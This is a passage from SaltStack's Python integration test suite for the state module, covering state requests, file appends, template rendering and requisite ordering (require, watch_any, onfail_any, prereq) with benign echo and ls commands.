Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if existing
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loops prevent this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there were any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_any requisites.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_any requisites.
Ensure that a failed requisite fails the dependent state.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several watch_any requisites.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several watch_any requisites.
Ensure that a failed requisite fails the watching state.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several onchanges_any requisites.
Ensure that states whose onchanges requisites did not change are not run.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several onfail_any requisites.
Ensure that onfail states run only when at least one watched state fails.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
